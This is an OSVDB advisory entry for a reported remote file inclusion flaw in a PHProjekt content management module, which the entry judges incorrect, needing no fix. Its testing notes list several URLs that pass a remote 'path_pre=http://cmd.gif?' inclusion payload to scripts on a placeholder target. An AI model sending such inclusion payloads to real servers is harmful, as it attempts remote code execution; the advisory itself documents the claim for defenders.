PHProjekt Content Management Module Multiple Script path_pre Variable Remote File Inclusion

2006-08-21T12:18:50
ID OSVDB:28217
Type osvdb
Reporter D3nGeR(D3nGeR@gmail.com)
Modified 2006-08-21T12:18:50

Description

Vulnerability Description

PHProjekt has been reported to contain a flaw that may allow a remote attacker to execute arbitrary commands. The issue is supposedly due to multiple scripts not properly sanitizing user input supplied to the 'pre_path' variable. However, subsequent examination shows that an attacker can not manipulate this variable before being used.

Solution Description

The vulnerability reported is incorrect. No solution required.

Short Description

PHProjekt has been reported to contain a flaw that may allow a remote attacker to execute arbitrary commands. The issue is supposedly due to multiple scripts not properly sanitizing user input supplied to the 'pre_path' variable. However, subsequent examination shows that an attacker can not manipulate this variable before being used.

Manual Testing Notes

http://[target]/[Path]/cm_lib.inc.php?path_pre=http://cmd.gif? http://[target]/[Path]/doc/br.edithelp.php?path_pre=http://cmd.gif? http://[target]/[Path]/doc/de.edithelp.php?path_pre=http://cmd.gif? http://[target]/[Path]/doc/ct.edithelp.php?path_pre=http://cmd.gif? http://[target]/[Path]/userrating.php?path_pre=http://cmd.gif? http://[target]/[Path]/listing.php?path_pre=http://cmd.gif?

References:

Vendor URL: http://mariovaldez.net/software/cm_4p/ Secunia Advisory ID:21590 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0463.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0438.html FrSIRT Advisory: ADV-2006-3373 CVE-2006-4609